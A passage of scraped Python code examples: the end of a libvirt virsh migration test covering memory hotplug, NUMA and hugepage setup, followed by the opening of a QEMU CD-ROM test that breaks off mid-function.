        # 256 MiB(min mem that can be hotplugged) * Max no of dimm slots
        # that can be hotplugged
        vm_max_mem_rt_limit = 256 * 1024 * vm_max_dimm_slots
        # configure Maxmem in guest xml for memory hotplug to work
        try:
            vm_max_mem_rt = int(vmxml_backup.max_mem_rt)
            if(vm_max_mem_rt <= vm_max_mem_rt_limit):
                vmxml_backup.max_mem_rt = (vm_max_mem_rt_limit +
                                           vm_max_mem)
                vmxml_backup.max_mem_rt_slots = vm_max_dimm_slots
                vmxml_backup.max_mem_rt_unit = mem_size_unit
                vmxml_backup.sync()
                vm_max_mem_rt = int(vmxml_backup.max_mem_rt)
        except LibvirtXMLNotFoundError:
            vmxml_backup.max_mem_rt = (vm_max_mem_rt_limit +
                                       vm_max_mem)
            vmxml_backup.max_mem_rt_slots = vm_max_dimm_slots
            vmxml_backup.max_mem_rt_unit = mem_size_unit
            vmxml_backup.sync()
            vm_max_mem_rt = int(vmxml_backup.max_mem_rt)
        logging.debug("Hotplug mem = %d %s" % (mem_hotplug_size,
                                               mem_size_unit))
        logging.debug("Hotplug count = %d" % mem_hotplug_count)
        logging.debug("Current mem = %d" % vm_current_mem)
        logging.debug("VM maxmem = %d" % vm_max_mem_rt)
        if((vm_current_mem + vm_hotplug_mem) > vm_max_mem_rt):
            raise exceptions.TestSkipError("Cannot hotplug memory more than"
                                           "max dimm slots supported")
        if mem_hotplug_count > vm_max_dimm_slots:
            raise exceptions.TestSkipError("Cannot hotplug memory more than"
                                           " %d times" % vm_max_dimm_slots)

    # Get expected cache state for test
    attach_scsi_disk = "yes" == params.get("attach_scsi_disk", "no")
    disk_cache = params.get("virsh_migrate_disk_cache", "none")
    params["driver_cache"] = disk_cache
    unsafe_test = False
    if options.count("unsafe") and disk_cache != "none":
        unsafe_test = True

    nfs_client = None
    seLinuxBool = None
    skip_exception = False
    exception = False
    remote_viewer_pid = None
    asynch_migration = False
    ret_migrate = True

    try:
        # Change the disk of the vm to shared disk
        libvirt.set_vm_disk(vm, params)
        # Backup the SELinux status on local host for recovering
        local_selinux_bak = params.get("selinux_status_bak")

        # Configure NFS client on remote host
        nfs_client = nfs.NFSClient(params)
        nfs_client.setup()

        logging.info("Enable virt NFS SELinux boolean on target host.")
        seLinuxBool = SELinuxBoolean(params)
        seLinuxBool.setup()

        subdriver = utils_test.get_image_info(shared_storage)['format']
        extra_attach = ("--config --driver qemu --subdriver %s --cache %s"
                        % (subdriver, disk_cache))

        # Attach a scsi device for special testcases
        if attach_scsi_disk:
            shared_dir = os.path.dirname(shared_storage)
            # This is a workaround. It does not take effect to specify
            # this parameter in config file
            params["image_name"] = "scsi_test"
            scsi_qemuImg = QemuImg(params, shared_dir, '')
            scsi_disk, _ = scsi_qemuImg.create(params)
            s_attach = virsh.attach_disk(vm_name, scsi_disk, "sdb",
                                         extra_attach, debug=True)
            if s_attach.exit_status != 0:
                logging.error("Attach another scsi disk failed.")

        # Get vcpu and memory info of guest for numa related tests
        if enable_numa:
            numa_dict_list = []
            vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
            vcpu = vmxml.vcpu
            max_mem = vmxml.max_mem
            max_mem_unit = vmxml.max_mem_unit
            if vcpu < 1:
                raise error.TestError("%s not having even 1 vcpu"
                                      % vm.name)
            else:
                numa_dict_list = create_numa(vcpu, max_mem, max_mem_unit)
            vmxml_cpu = vm_xml.VMCPUXML()
            vmxml_cpu.xml = "<cpu><numa/></cpu>"
            logging.debug(vmxml_cpu.numa_cell)
            vmxml_cpu.numa_cell = numa_dict_list
            logging.debug(vmxml_cpu.numa_cell)
            vmxml.cpu = vmxml_cpu
            if enable_numa_pin:
                memnode_mode = []
                memnode_mode.append(params.get("memnode_mode_1", 'preferred'))
                memnode_mode.append(params.get("memnode_mode_2", 'preferred'))
                memory_dict, memnode_list = numa_pin(memory_mode, memnode_mode,
                                                     numa_dict_list,
                                                     host_numa_node_list)
                logging.debug(memory_dict)
                logging.debug(memnode_list)
                if memory_dict:
                    vmxml.numa_memory = memory_dict
                if memnode_list:
                    vmxml.numa_memnode = memnode_list

            # Hugepage enabled guest by pinning to node
            if enable_HP_pin:
                # if only 1 numanode created based on vcpu available
                # check param needs to pin HP to 2 nodes
                if len(numa_dict_list) == 1:
                    if (hp_pin_nodes == 2):
                        hp_pin_nodes = 1
                if enable_numa_pin:
                    HP_page_list = enable_hugepage(vm_name, no_of_HPs,
                                                   hp_unit=default_hp_unit,
                                                   hp_node=hp_pin_nodes,
                                                   pin=True,
                                                   node_list=memnode_list,
                                                   host_hp_size=host_hp_size,
                                                   numa_pin=True)
                else:
                    HP_page_list = enable_hugepage(vm_name, no_of_HPs,
                                                   hp_unit=default_hp_unit,
                                                   hp_node=hp_pin_nodes,
                                                   host_hp_size=host_hp_size,
                                                   pin=True)
                vmxml_mem = vm_xml.VMMemBackingXML()
                vmxml_hp = vm_xml.VMHugepagesXML()
                pagexml_list = []
                for page in range(len(HP_page_list)):
                    pagexml = vmxml_hp.PageXML()
                    pagexml.update(HP_page_list[page])
                    pagexml_list.append(pagexml)
                vmxml_hp.pages = pagexml_list
                vmxml_mem.hugepages = vmxml_hp
                vmxml.mb = vmxml_mem
            vmxml.sync()

        # Hugepage enabled guest without pinning to node
        if enable_HP:
            if enable_numa_pin:
                # HP with Numa pin
                HP_page_list = enable_hugepage(vm_name, no_of_HPs, pin=False,
                                               node_list=memnode_list,
                                               host_hp_size=host_hp_size,
                                               numa_pin=True)
            else:
                # HP without Numa pin
                HP_page_list = enable_hugepage(vm_name, no_of_HPs)
        if not vm.is_alive():
            vm.start()

        vm.wait_for_login()

        # Perform memory hotplug after VM is up
        if mem_hotplug:
            if enable_numa:
                numa_node = '0'
                if mem_hotplug_count == 1:
                    mem_xml = create_mem_hotplug_xml(mem_hotplug_size,
                                                     mem_size_unit, numa_node)
                    logging.info("Trying to hotplug memory")
                    ret_attach = virsh.attach_device(vm_name, mem_xml,
                                                     flagstr="--live",
                                                     debug=True)
                    if ret_attach.exit_status != 0:
                        logging.error("Hotplugging memory failed")
                elif mem_hotplug_count > 1:
                    for each_count in range(mem_hotplug_count):
                        mem_xml = create_mem_hotplug_xml(mem_hotplug_size,
                                                         mem_size_unit,
                                                         numa_node)
                        logging.info("Trying to hotplug memory")
                        ret_attach = virsh.attach_device(vm_name, mem_xml,
                                                         flagstr="--live",
                                                         debug=True)
                        if ret_attach.exit_status != 0:
                            logging.error("Hotplugging memory failed")
                        # Hotplug memory to numa node alternatively if
                        # there are 2 nodes
                        if len(numa_dict_list) == 2:
                            if numa_node == '0':
                                numa_node = '1'
                            else:
                                numa_node = '0'
                # check hotplugged memory is reflected
                vmxml_backup = vm_xml.VMXML.new_from_dumpxml(vm_name)
                vm_new_current_mem = int(vmxml_backup.current_mem)
                logging.debug("Old current memory %d" % vm_current_mem)
                logging.debug("Hot plug mem %d" % vm_hotplug_mem)
                logging.debug("New current memory %d" % vm_new_current_mem)
                logging.debug("old mem + hotplug = %d" % (vm_current_mem +
                                                          vm_hotplug_mem))
                if not (vm_new_current_mem == (vm_current_mem +
                                               vm_hotplug_mem)):
                    raise exceptions.TestFail("Memory hotplug failed")
                else:
                    logging.debug("Memory hotplugged successfully !!!")

        # Confirm VM can be accessed through network.
        time.sleep(delay)
        vm_ip = vm.get_address()
        logging.info("To check VM network connectivity before migrating")
        s_ping, o_ping = utils_test.ping(vm_ip, count=ping_count,
                                         timeout=ping_timeout)
        logging.info(o_ping)
        if s_ping != 0:
            raise error.TestError("%s did not respond after %d sec."
                                  % (vm.name, ping_timeout))

        # Prepare for --dname dest_exist_vm
        if extra.count("dest_exist_vm"):
            logging.debug("Preparing a new vm on destination for exist dname")
            vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
            vmxml.vm_name = extra.split()[1].strip()
            del vmxml.uuid
            # Define a new vm on destination for --dname
            virsh.define(vmxml.xml, uri=dest_uri)

        # Prepare for --xml.
        xml_option = params.get("xml_option", "no")
        if xml_option == "yes":
            if not extra.count("--dname") and not extra.count("--xml"):
                logging.debug("Preparing new xml file for --xml option.")
                ret_attach = vm.attach_interface("--type bridge --source "
                                                 "virbr0 --target tmp-vnet",
                                                 True, True)
                if not ret_attach:
                    exception = True
                    raise error.TestError("Attaching nic to %s failed."
                                          % vm.name)
                ifaces = vm_xml.VMXML.get_net_dev(vm.name)
                new_nic_mac = vm.get_virsh_mac_address(
                    ifaces.index("tmp-vnet"))
                vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
                logging.debug("Xml file on source:\n%s" % vm.get_xml())
                extra = ("%s --xml=%s" % (extra, vmxml.xml))
            elif extra.count("--dname"):
                vm_new_name = params.get("vm_new_name")
                vmxml = vm_xml.VMXML.new_from_dumpxml(vm.name)
                if vm_new_name:
                    logging.debug("Preparing change VM XML with a new name")
                    vmxml.vm_name = vm_new_name
                extra = ("%s --xml=%s" % (extra, vmxml.xml))

        # Turn VM into certain state.
        logging.debug("Turning %s into certain state." % vm.name)
        if src_state == "paused":
            if vm.is_alive():
                vm.pause()
        elif src_state == "shut off":
            if vm.is_alive():
                if not vm.shutdown():
                    vm.destroy()

        # Turn libvirtd into certain state.
        logging.debug("Turning libvirtd into certain status.")
        if libvirtd_state == "off":
            utils_libvirtd.libvirtd_stop()

        # Test uni-direction migration.
        logging.debug("Doing migration test.")
        if vm_ref != vm_name:
            vm.name = vm_ref    # For vm name error testing.
        if unsafe_test:
            options = "--live"

        if graphics_server:
            cmd = "%s %s" % (remote_viewer_executable, graphics_server)
            logging.info("Execute command: %s", cmd)
            ps = process.SubProcess(cmd, shell=True)
            remote_viewer_pid = ps.start()
            logging.debug("PID for process '%s': %s",
                          remote_viewer_executable, remote_viewer_pid)

        # Case for option '--timeout --timeout-suspend'
        # 1. Start the guest
        # 2. Set migration speed to a small value. Ensure the migration
        #    duration is much larger than the timeout value
        # 3. Start the migration
        # 4. When the eclipse time reaches the timeout value, check the guest
        #    state to be paused on both source host and target host
        # 5. Wait for the migration done. Check the guest state to be shutoff
        #    on source host and running on target host
        if extra.count("--timeout-suspend"):
            asynch_migration = True
            speed = int(params.get("migrate_speed", 1))
            timeout = int(params.get("timeout_before_suspend", 5))
            logging.debug("Set migration speed to %sM", speed)
            virsh.migrate_setspeed(vm_name, speed, debug=True)
            migration_test = libvirt.MigrationTest()
            migrate_options = "%s %s" % (options, extra)
            vms = [vm]
            params["vm_migration"] = vm
            migration_test.do_migration(vms, None, dest_uri, 'orderly',
                                        migrate_options, thread_timeout=900,
                                        ignore_status=True,
                                        func=check_migration_timeout_suspend,
                                        func_params=params)
            ret_migrate = migration_test.RET_MIGRATION
        if postcopy_cmd != "":
            asynch_migration = True
            vms = []
            vms.append(vm)
            obj_migration = libvirt.MigrationTest()
            migrate_options = "%s %s" % (options, extra)
            cmd = "sleep 5 && virsh %s %s" % (postcopy_cmd, vm_name)
            logging.info("Starting migration in thread")
            try:
                obj_migration.do_migration(vms, src_uri, dest_uri, "orderly",
                                           options=migrate_options,
                                           thread_timeout=postcopy_timeout,
                                           ignore_status=False,
                                           func=process.run,
                                           func_params=cmd,
                                           shell=True)
            except Exception, info:
                raise exceptions.TestFail(info)
            if obj_migration.RET_MIGRATION:
                utils_test.check_dest_vm_network(vm, vm.get_address(),
                                                 server_ip, server_user,
                                                 server_pwd)
                ret_migrate = True
            else:
                ret_migrate = False
        if not asynch_migration:
            ret_migrate = do_migration(delay, vm, dest_uri, options, extra)

        dest_state = params.get("virsh_migrate_dest_state", "running")
        if ret_migrate and dest_state == "running":
            server_session = remote.wait_for_login('ssh', server_ip, '22',
                                                   server_user, server_pwd,
                                                   r"[\#\$]\s*$")
            logging.info("Check VM network connectivity after migrating")
            s_ping, o_ping = utils_test.ping(vm_ip, count=ping_count,
                                             timeout=ping_timeout,
                                             output_func=logging.debug,
                                             session=server_session)
            logging.info(o_ping)
            if s_ping != 0:
                server_session.close()
                raise error.TestError("%s did not respond after %d sec."
                                      % (vm.name, ping_timeout))
            server_session.close()

        if graphics_server:
            logging.info("To check the process running '%s'.",
                         remote_viewer_executable)
            if process.pid_exists(int(remote_viewer_pid)) is False:
                raise error.TestFail("PID '%s' for process '%s'"
                                     " does not exist"
                                     % (remote_viewer_pid,
                                        remote_viewer_executable))
            else:
                logging.info("PID '%s' for process '%s' still exists"
                             " as expected.",
                             remote_viewer_pid,
                             remote_viewer_executable)
            logging.debug("Kill the PID '%s' running '%s'",
                          remote_viewer_pid,
                          remote_viewer_executable)
            process.kill_process_tree(int(remote_viewer_pid))

        # Check unsafe result and may do migration again in right mode
        check_unsafe_result = True
        if ret_migrate is False and unsafe_test:
            options = params.get("virsh_migrate_options")
            ret_migrate = do_migration(delay, vm, dest_uri, options, extra)
        elif ret_migrate and unsafe_test:
            check_unsafe_result = False
        if vm_ref != vm_name:
            vm.name = vm_name

        # Recover libvirtd state.
        logging.debug("Recovering libvirtd status.")
        if libvirtd_state == "off":
            utils_libvirtd.libvirtd_start()

        # Check vm state on destination.
        logging.debug("Checking %s state on target %s.", vm.name,
                      vm.connect_uri)
        if (options.count("dname") or
                extra.count("dname") and status_error != 'yes'):
            vm.name = extra.split()[1].strip()
        check_dest_state = True
        check_dest_state = check_vm_state(vm, dest_state)
        logging.info("Supposed state: %s" % dest_state)
        logging.info("Actual state: %s" % vm.state())

        # Check vm state on source.
        if extra.count("--timeout-suspend"):
            logging.debug("Checking '%s' state on source '%s'", vm.name,
                          src_uri)
            vm_state = virsh.domstate(vm.name, uri=src_uri).stdout.strip()
            if vm_state != "shut off":
                raise exceptions.TestFail("Local vm state should be 'shut off'"
                                          ", but found '%s'" % vm_state)

        # Recover VM state.
        logging.debug("Recovering %s state." % vm.name)
        if src_state == "paused":
            vm.resume()
        elif src_state == "shut off":
            vm.start()

        # Checking for --persistent.
        check_dest_persistent = True
        if options.count("persistent") or extra.count("persistent"):
            logging.debug("Checking for --persistent option.")
            if not vm.is_persistent():
                check_dest_persistent = False

        # Checking for --undefinesource.
        check_src_undefine = True
        if options.count("undefinesource") or extra.count("undefinesource"):
            logging.debug("Checking for --undefinesource option.")
            logging.info("Verifying <virsh domstate> DOES return an error."
                         "%s should not exist on %s." % (vm_name, src_uri))
            if virsh.domain_exists(vm_name, uri=src_uri):
                check_src_undefine = False

        # Checking for --dname.
        check_dest_dname = True
        if (options.count("dname") or extra.count("dname") and
                status_error != 'yes'):
            logging.debug("Checking for --dname option.")
            dname = extra.split()[1].strip()
            if not virsh.domain_exists(dname, uri=dest_uri):
                check_dest_dname = False

        # Checking for --xml.
        check_dest_xml = True
        if (xml_option == "yes" and not extra.count("--dname") and
                not extra.count("--xml")):
            logging.debug("Checking for --xml option.")
            vm_dest_xml = vm.get_xml()
            logging.info("Xml file on destination: %s" % vm_dest_xml)
            if not re.search(new_nic_mac, vm_dest_xml):
                check_dest_xml = False

    except exceptions.TestSkipError, detail:
        skip_exception = True
    except Exception, detail:
        exception = True
        logging.error("%s: %s" % (detail.__class__, detail))

    # Whatever error occurs, we have to clean up all environment.
    # Make sure vm.connect_uri is the destination uri.
    vm.connect_uri = dest_uri
    if (options.count("dname") or extra.count("dname") and
            status_error != 'yes'):
        # Use the VM object to remove
        vm.name = extra.split()[1].strip()
        cleanup_dest(vm, src_uri)
        vm.name = vm_name
    else:
        cleanup_dest(vm, src_uri)

    # Recover source (just in case).
    # Simple sync cannot be used here, because the vm may not exists and
    # it cause the sync to fail during the internal backup.
    vm.destroy()
    vm.undefine()
    orig_config_xml.define()

    # cleanup xml created during memory hotplug test
    if mem_hotplug:
        if os.path.isfile(mem_xml):
            data_dir.clean_tmp_files()
            logging.debug("Cleanup mem hotplug xml")

    # cleanup hugepages
    if enable_HP or enable_HP_pin:
        logging.info("Cleanup Hugepages")
        # cleaning source hugepages
        hugepage_assign("0")
        # cleaning destination hugepages
        hugepage_assign(
            "0", target_ip=server_ip, user=server_user, password=server_pwd)

    if attach_scsi_disk:
        libvirt.delete_local_disk("file", path=scsi_disk)

    if seLinuxBool:
        logging.info("Recover virt NFS SELinux boolean on target host...")
        # keep .ssh/authorized_keys for NFS cleanup later
        seLinuxBool.cleanup(True)

    if nfs_client:
        logging.info("Cleanup NFS client environment...")
        nfs_client.cleanup()

    logging.info("Remove the NFS image...")
    source_file = params.get("source_file")
    libvirt.delete_local_disk("file", path=source_file)

    logging.info("Cleanup NFS server environment...")
    exp_dir = params.get("export_dir")
    mount_dir = params.get("mnt_path_name")
    libvirt.setup_or_cleanup_nfs(False, export_dir=exp_dir,
                                 mount_dir=mount_dir,
                                 restore_selinux=local_selinux_bak)
    if skip_exception:
        raise exceptions.TestSkipError(detail)
    if exception:
        raise error.TestError(
            "Error occurred. \n%s: %s" % (detail.__class__, detail))

    # Check test result.
    if status_error == 'yes':
        if ret_migrate:
            raise error.TestFail("Migration finished with unexpected status.")
    else:
        if not ret_migrate:
            raise error.TestFail("Migration finished with unexpected status.")
        if not check_dest_state:
            raise error.TestFail("Wrong VM state on destination.")
        if not check_dest_persistent:
            raise error.TestFail("VM is not persistent on destination.")
        if not check_src_undefine:
            raise error.TestFail("VM is not undefined on source.")
        if not check_dest_dname:
            raise error.TestFail("Wrong VM name %s on destination." % dname)
        if not check_dest_xml:
            raise error.TestFail("Wrong xml configuration on destination.")
        if not check_unsafe_result:
            raise error.TestFail("Migration finished in unsafe mode.")

Example 7

Project: tp-qemu
Source File: cdrom.py
View license
@error.context_aware
def run(test, params, env):
    """
    KVM cdrom test:

    1) Boot up a VM, with one iso image (optional).
    2) Check if VM identifies correctly the iso file.
    3) Verifies that device is unlocked <300s after boot (optional, if
       cdrom_test_autounlock is set).
    4) Eject cdrom using monitor.
    5) Change cdrom image with another iso several times.
    5) Test tray reporting function (optional, if cdrom_test_tray_status is set)
    6) Try to format cdrom and check the return string.
    7) Mount cdrom device.
    8) Copy file from cdrom and compare files.
    9) Umount and mount cdrom in guest for several times.
    10) Check if the cdrom lock works well when iso file is not inserted.
    11) Reboot vm after vm resume from s3/s4.
        Note: This case requires a qemu cli without setting file property
        for -drive option, and will be separated to a different cfg item.

    :param test: kvm test object
    :param params: Dictionary with the test parameters
    :param env: Dictionary with test environment.

    :param cfg: workaround_eject_time - Some versions of qemu are unable to
                                        eject CDROM directly after insert
    :param cfg: cdrom_test_autounlock - Test whether guest OS unlocks cdrom
                                        after boot (<300s after VM is booted)
    :param cfg: cdrom_test_tray_status - Test tray reporting (eject and insert
                                         CD couple of times in guest).
    :param cfg: cdrom_test_locked -     Test whether cdrom tray lock function
                                        work well in guest.
    :param cfg: cdrom_test_eject -      Test whether cdrom works well after
                                        several times of eject action.
    :param cfg: cdrom_test_file_operation - Test file operation for cdrom,
                                            such as mount/umount, reading files
                                            on cdrom.

    @warning: Check dmesg for block device failures
    """
    # Some versions of qemu are unable to eject CDROM directly after insert
    workaround_eject_time = float(params.get('workaround_eject_time', 0))

    login_timeout = int(params.get("login_timeout", 360))
    cdrom_prepare_timeout = int(params.get("cdrom_preapre_timeout", 360))

    def generate_serial_num():
        length = int(params.get("length", "10"))
        id_leng = random.randint(6, length)
        ignore_str = ",!\"#$%&\'()*+./:;<=>[email protected][\\]^`{|}~"
        return utils_misc.generate_random_string(id_leng, ignore_str)

    def list_guest_cdroms(session):
        """
        Get cdrom lists from guest os;

        :param session: ShellSession object;
        :param params: test params dict;
        :return: list of cdroms;
        :rtype: list
        """
        list_cdrom_cmd = "wmic cdrom get Drive"
        filter_cdrom_re = "\w:"
        if params["os_type"] != "windows":
            list_cdrom_cmd = "ls /dev/cdrom*"
            filter_cdrom_re = r"/dev/cdrom-\w+|/dev/cdrom\d*"
        output = session.cmd_output(list_cdrom_cmd)
        cdroms = re.findall(filter_cdrom_re, output)
        cdroms.sort()
        return cdroms

    def get_cdrom_mount_point(session, drive_letter, params):
        """
        Get default cdrom mount point;
        """
        mount_point = "/mnt"
        if params["os_type"] == "windows":
            cmd = "wmic volume where DriveLetter='%s' " % drive_letter
            cmd += "get DeviceID | more +1"
            mount_point = session.cmd_output(cmd).strip()
        return mount_point

    @error.context_aware
    def create_iso_image(params, name, prepare=True, file_size=None):
        """
        Creates 'new' iso image with one file on it

        :param params: parameters for test
        :param name: name of new iso image file
        :param preapre: if True then it prepare cd images.
        :param file_size: Size of iso image in MB

        :return: path to new iso image file.
        """
        error.context("Creating test iso image '%s'" % name, logging.info)
        cdrom_cd = params["target_cdrom"]
        cdrom_cd = params[cdrom_cd]
        if not os.path.isabs(cdrom_cd):
            cdrom_cd = utils_misc.get_path(data_dir.get_data_dir(), cdrom_cd)
        iso_image_dir = os.path.dirname(cdrom_cd)
        if file_size is None:
            file_size = 10
        g_mount_point = tempfile.mkdtemp("gluster")
        image_params = params.object_params(name)
        if image_params.get("enable_gluster") == "yes":
            if params.get("gluster_server"):
                gluster_server = params.get("gluster_server")
            else:
                gluster_server = "localhost"
            volume_name = params["gluster_volume_name"]
            g_mount_link = "%s:/%s" % (gluster_server, volume_name)
            mount_cmd = "mount -t glusterfs %s %s" % (g_mount_link, g_mount_point)
            utils.system(mount_cmd, timeout=60)
            file_name = os.path.join(g_mount_point, "%s.iso" % name)
        else:
            file_name = utils_misc.get_path(iso_image_dir, "%s.iso" % name)
        if prepare:
            cmd = "dd if=/dev/urandom of=%s bs=1M count=%d"
            utils.run(cmd % (name, file_size))
            utils.run("mkisofs -o %s %s" % (file_name, name))
            utils.run("rm -rf %s" % (name))
        if image_params.get("enable_gluster") == "yes":
            gluster_uri = gluster.create_gluster_uri(image_params)
            file_name = "%s%s.iso" % (gluster_uri, name)
            try:
                umount_cmd = "umount %s" % g_mount_point
                utils.system(umount_cmd, timeout=60)
                os.rmdir(g_mount_point)
            except Exception, err:
                msg = "Fail to clean up %s" % g_mount_point
                msg += "Error message %s" % err
                logging.warn(msg)
        return file_name

    def cleanup_cdrom(path):
        """ Removes created iso image """
        if path:
            error.context("Cleaning up temp iso image '%s'" % path,
                          logging.info)
            if "gluster" in path:
                g_mount_point = tempfile.mkdtemp("gluster")
                g_server, v_name, f_name = path.split("/")[-3:]
                if ":" in g_server:
                    g_server = g_server.split(":")[0]
                g_mount_link = "%s:/%s" % (g_server, v_name)
                mount_cmd = "mount -t glusterfs %s %s" % (g_mount_link,
                                                          g_mount_point)
                utils.system(mount_cmd, timeout=60)
                path = os.path.join(g_mount_point, f_name)
            try:
                logging.debug("Remove the file with os.remove().")
                os.remove("%s" % path)
            except OSError, err:
                logging.warn("Fail to delete %s" % path)
            if "gluster" in path:
                try:
                    umount_cmd = "umount %s" % g_mount_point
                    utils.system(umount_cmd, timeout=60)
                    os.rmdir(g_mount_point)
                except Exception, err:
                    msg = "Fail to clean up %s" % g_mount_point
                    msg += "Error message %s" % err
                    logging.warn(msg)

    def get_cdrom_file(vm, qemu_cdrom_device):
        """
        :param vm: VM object
        :param qemu_cdrom_device: qemu monitor device
        :return: file associated with $qemu_cdrom_device device
        """
        blocks = vm.monitor.info("block")
        cdfile = None
        if isinstance(blocks, str):
            tmp_re_str = r'%s: .*file=(\S*) ' % qemu_cdrom_device
            file_list = re.findall(tmp_re_str, blocks)
            if file_list:
                cdfile = file_list[0]
            else:
                # try to deal with new qemu
                tmp_re_str = r'%s: (\S*) \(.*\)' % qemu_cdrom_device
                file_list = re.findall(tmp_re_str, blocks)
                if file_list:
                    cdfile = file_list[0]
        else:
            for block in blocks:
                if block['device'] == qemu_cdrom_device:
                    try:
                        cdfile = block['inserted']['file']
                        break
                    except KeyError:
                        continue
        return cdfile

    def _get_tray_stat_via_monitor(vm, qemu_cdrom_device):
        """
        Get the cdrom tray status via qemu monitor
        """
        is_open, checked = (None, False)

        blocks = vm.monitor.info("block")
        if isinstance(blocks, str):
            for block in blocks.splitlines():
                if qemu_cdrom_device in block:
                    if "tray-open=1" in block:
                        is_open, checked = (True, True)
                    elif "tray-open=0" in block:
                        is_open, checked = (False, True)
            # fallback to new qemu
            tmp_block = ""
            for block_new in blocks.splitlines():
                if tmp_block and "Removable device" in block_new:
                    if "tray open" in block_new:
                        is_open, checked = (True, True)
                    elif "tray closed" in block_new:
                        is_open, checked = (False, True)
                if qemu_cdrom_device in block_new:
                    tmp_block = block_new
                else:
                    tmp_block = ""
        else:
            for block in blocks:
                if block['device'] == qemu_cdrom_device:
                    key = filter(lambda x: re.match(r"tray.*open", x),
                                 block.keys())
                    # compatible rhel6 and rhel7 diff qmp output
                    if not key:
                        break
                    is_open, checked = (block[key[0]], True)
        return (is_open, checked)

    def is_tray_opened(vm, qemu_cdrom_device, mode='monitor',
                       dev_name="/dev/sr0"):
        """
        Checks whether the tray is opend

        :param vm: VM object
        :param qemu_cdrom_device: cdrom image file name.
        :param mode: tray status checking mode, now support:
                     "monitor": get tray status from monitor.
                     "session": get tray status from guest os.
                     "mixed": get tray status first, if failed, try to
                              get the status in guest os again.
        :param dev_name: cdrom device name in guest os.

        :return: True if cdrom tray is open, otherwise False.
                 None if failed to get the tray status.
        """
        is_open, checked = (None, False)

        if mode in ['monitor', 'mixed']:
            is_open, checked = _get_tray_stat_via_monitor(
                vm, qemu_cdrom_device)

        if (mode in ['session', 'mixed']) and not checked:
            session = vm.wait_for_login(timeout=login_timeout)
            tray_cmd = params["tray_check_cmd"] % dev_name
            o = session.cmd_output(tray_cmd)
            if "cdrom is open" in o:
                is_open, checked = (True, True)
            else:
                is_open, checked = (False, True)
        if checked:
            return is_open
        return None

    @error.context_aware
    def check_cdrom_lock(vm, cdrom):
        """
        Checks whether the cdrom is locked

        :param vm: VM object
        :param cdrom: cdrom object

        :return: Cdrom state if locked return True
        """
        error.context("Check cdrom state of locing.")
        blocks = vm.monitor.info("block")
        if isinstance(blocks, str):
            for block in blocks.splitlines():
                if cdrom in block:
                    if "locked=1" in block:
                        return True
                    elif "locked=0" in block:
                        return False
            # deal with new qemu
            lock_str_new = "locked"
            no_lock_str = "not locked"
            tmp_block = ""
            for block_new in blocks.splitlines():
                if tmp_block and "Removable device" in block_new:
                    if no_lock_str in block_new:
                        return False
                    elif lock_str_new in block_new:
                        return True
                if cdrom in block_new:
                    tmp_block = block_new
                else:
                    tmp_block = ""
        else:
            for block in blocks:
                if block['device'] == cdrom and 'locked' in block.keys():
                    return block['locked']
        return None

    @error.context_aware
    def get_device(vm, dev_file_path):
        """
        Get vm device class from device path.

        :param vm: VM object.
        :param dev_file_path: Device file path.
        :return: device object
        """
        error.context("Get cdrom device object")
        device = vm.get_block({'file': dev_file_path})
        if not device:
            device = vm.get_block({'backing_file': dev_file_path})
            if not device:
                raise error.TestFail("Could not find a valid cdrom device")
        return device

    def get_match_cdrom(vm, session, serial_num):
        """
        Find the cdrom in guest which is corresponding with the CML
        according to the serial number.

        :param session: VM session.
        :param serial num: serial number of the cdrom.
        :return match_cdrom: the cdrom in guest which is corresponding
                             with the CML according to the serial number.
        """
        error.context("Get matching cdrom in guest", logging.info)
        show_serial_num = "ls -l /dev/disk/by-id"
        serial_num_output = session.cmd_output(show_serial_num)
        if serial_num_output:
            serial_cdrom = ""
            for line in serial_num_output.splitlines():
                if utils_misc.find_substring(str(line), str(serial_num)):
                    serial_cdrom = line.split(" ")[-1].split("/")[-1]
                    break
            if not serial_cdrom:
                qtree_info = vm.monitor.info("qtree")
                raise error.TestFail("Could not find the device whose "
                                     "serial number %s is same in Qemu"
                                     " CML.\n Qtree info: %s" %
                                     (serial_num, qtree_info))

        show_cdrom_cmd = "ls -l /dev/cdrom*"
        dev_cdrom_output = session.cmd_output(show_cdrom_cmd)
        if dev_cdrom_output:
            for line in dev_cdrom_output.splitlines():
                if utils_misc.find_substring(str(line), str(serial_cdrom)):
                    match_cdrom = line.split(" ")[-3]
                    return match_cdrom
            raise error.TestFail("Could not find the corresponding cdrom"
                                 "in guest which is same in Qemu CML.")

    def get_testing_cdrom_device(vm, session, cdrom_dev_list, serial_num=None):
        """
        Get the testing cdrom used for eject
        :param session: VM session
        :param cdrom_dev_list: cdrom_dev_list
        """
        try:
            if params["os_type"] == "windows":
                winutil_drive = utils_misc.get_winutils_vol(session)
                winutil_drive = "%s:" % winutil_drive
                cdrom_dev_list.remove(winutil_drive)
                testing_cdrom_device = cdrom_dev_list[-1]
            else:
                testing_cdrom_device = get_match_cdrom(vm, session, serial_num)
        except IndexError:
            raise error.TestFail("Could not find the testing cdrom device")

        return testing_cdrom_device

    def disk_copy(vm, src_path, dst_path, copy_timeout=None, dsize=None):
        """
        Start disk load. Cyclic copy from src_path to dst_path.

        :param vm: VM where to find a disk.
        :param src_path: Source of data
        :param dst_path: Path to destination
        :param copy_timeout: Timeout for copy
        :param dsize: Size of data block which is periodical copied.
        """
        if copy_timeout is None:
            copy_timeout = 120
        session = vm.wait_for_login(timeout=login_timeout)
        copy_file_cmd = (
            "nohup cp %s %s 2> /dev/null &" % (src_path, dst_path))
        get_pid_cmd = "echo $!"
        if params["os_type"] == "windows":
            copy_file_cmd = "start cmd /c copy /y %s %s" % (src_path, dst_path)
            get_pid_cmd = "wmic process where name='cmd.exe' get ProcessID"
        session.cmd(copy_file_cmd, timeout=copy_timeout)
        pid = re.findall(r"\d+", session.cmd_output(get_pid_cmd))[-1]
        return pid

    def get_empty_cdrom_device(vm):
        """
        Get cdrom device when cdrom is not insert.
        """
        device = None
        blocks = vm.monitor.info("block")
        if isinstance(blocks, str):
            for block in blocks.strip().split('\n'):
                if 'not inserted' in block:
                    device = block.split(':')[0]
        else:
            for block in blocks:
                if 'inserted' not in block.keys():
                    device = block['device']
        return device

    def eject_test_via_monitor(vm, qemu_cdrom_device, guest_cdrom_device,
                               iso_image_orig, iso_image_new, max_times):
        """
        Test cdrom eject function via qemu monitor.
        """
        error.context("Eject the iso image in monitor %s times" % max_times,
                      logging.info)
        session = vm.wait_for_login(timeout=login_timeout)
